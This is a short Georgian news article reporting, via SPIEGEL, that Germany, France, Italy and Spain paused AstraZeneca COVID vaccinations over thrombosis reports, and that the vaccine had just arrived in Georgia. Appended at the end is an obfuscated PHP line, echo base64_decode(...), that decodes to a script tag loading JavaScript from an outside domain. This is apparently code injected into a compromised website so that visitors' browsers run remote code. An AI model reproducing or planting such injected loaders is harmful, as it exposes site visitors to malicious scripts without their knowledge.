celsiusi
ავერსი შნაიდერი
“ასტრაზენეკა” აღარ გამოიყენება გერმანიაში. პოლ ერლიხის ინსტიტუტის (PEI) ამჟამინდელი რეკომენდაციის თანახმად, გერმანიის მთავრობამ შეაჩერა ვაქცინაცია სიფრთხილისთვის. ამის შესახებ გერმანიის ჯანდაცვის  სამინისტრომ განაცხადა. 
 
როგორც “SPIEGEL”-ი იუწყება ვაქცინაციის შეჩერება ემყარება ვენების თრომბოზის ცნობებს , რომელიც კავშირშია ვაქცინაციასთან. რის გამოც , გერმანიაში, პაულ ერლიხის ინსტიტუტმა დამატებითი კვლევების  საჭიროება დაადასტურა.  
 
“ცოტა ხნის შემდეგ, საფრანგეთმა და იტალიამ შეაჩერეს ვაქცინაცია “ასტრაზენეკას” ვაქცინით.  ამის შესახებ ორშაბათს საფრანგეთის პრეზიდენტმა ემანუელ მაკრონმა და იტალიის ჯანდაცვის სფეროს წარმომადგენლებმა განაცხადეს. საღამოს ესპანეთმაც  მიბაძა. ესპანეთის ჯანდაცვის მინისტრის კაროლინა დარიასის განცხადებით, თავდაპირველად ვაქცინაცია ორი კვირით შეჩერდება.” - წერს გამოცემა “SPIEGEL” -ი. 
 
 
შეგახსენებთ , რომ “ასტრაზენეკას “ ვაქცინა საქართველოში 13 მარტს შემოვიდა და ვაქცინაციის პროცესი სამედიცინო სფეროს პირებზე გუშინ დაიწყო. ცნობისთვის, ევროპის რამდენიმე ქვეყანაში , როგორიცაა: გერმანია, საფრანგეთი, იტალია, ბელგია და სხვა “ასტრაზენეკას ვაქცინა”დროებით შეაჩერეს. 
  
1620
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");